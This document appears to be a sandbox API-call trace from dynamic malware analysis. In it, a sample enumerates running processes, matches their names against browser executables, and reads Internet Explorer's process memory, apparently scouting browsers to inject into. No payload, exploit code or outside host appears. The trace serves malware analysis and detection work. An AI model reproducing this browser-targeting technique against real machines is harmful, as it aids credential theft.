	[0254.657] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0254.658] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xacf8
	[0254.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.658] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0254.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.658] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.659] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0254.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.660] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.660] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0254.661] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xacfc
	[0254.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.661] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0254.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.661] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.662] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0254.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.662] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.662] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0254.663] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xad00
	[0254.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.663] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0254.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.663] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.664] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0254.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.664] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.664] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0254.665] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xad04
	[0254.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.665] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0254.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.666] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.666] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0254.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.666] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.667] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0254.667] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xad08
	[0254.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.668] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0254.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.668] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.669] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0254.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.669] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.670] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0254.671] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xad0c
	[0254.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.671] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0254.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.671] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.671] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0254.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.672] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.672] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0254.673] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xad10
	[0254.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.673] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0254.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.673] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.674] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0254.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.674] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.675] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0254.675] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xad14
	[0254.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.675] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0254.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.676] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.676] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0254.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.677] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.677] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0254.678] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xad18
	[0254.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.678] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0254.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.678] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.679] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0254.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.679] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.679] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0254.680] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xad1c
	[0254.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.680] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0254.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.680] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.681] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0254.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.681] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.681] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0254.682] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xad20
	[0254.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.682] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0254.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.682] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.683] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0254.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.683] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.684] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0254.684] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xad24
	[0254.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.685] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0254.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.685] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.686] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0254.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.687] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.687] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0254.688] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xad28
	[0254.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.688] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0254.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.689] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.689] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0254.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.690] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.690] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0254.691] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xad2c
	[0254.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.691] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0254.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.692] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.692] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0254.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.693] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.694] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0254.694] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xad30
	[0254.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.694] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0254.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.695] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.695] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0254.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.696] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.696] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0254.697] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xad34
	[0254.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.697] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0254.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.698] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0254.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.698] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0254.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.698] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.698] NtQueryInformationProcess (in: ProcessHandle=0xad34, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0254.699] ReadProcessMemory (in: hProcess=0xad34, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0254.699] ReadProcessMemory (in: hProcess=0xad34, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0254.699] ReadProcessMemory (in: hProcess=0xad34, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0254.699] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0254.699] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0254.700] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xad38
	[0254.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.700] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0254.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.701] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0254.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.701] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0254.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.702] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.702] NtQueryInformationProcess (in: ProcessHandle=0xad38, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0254.703] ReadProcessMemory (in: hProcess=0xad38, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0254.703] ReadProcessMemory (in: hProcess=0xad38, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0254.703] ReadProcessMemory (in: hProcess=0xad38, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0254.703] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0254.703] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0254.704] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xad3c
	[0254.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.704] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0254.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.704] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.705] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0254.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.705] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.706] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0254.707] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xad40
	[0254.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.708] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0254.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.708] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.709] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0254.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.709] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.710] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.711] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xad44
	[0254.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.711] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.711] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.712] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.712] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.713] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.714] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.715] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0xad48
	[0254.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.715] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.716] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.716] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.717] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.717] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.769] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0xad4c
	[0254.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.770] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.771] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.771] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.772] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.773] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0254.774] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0xad50
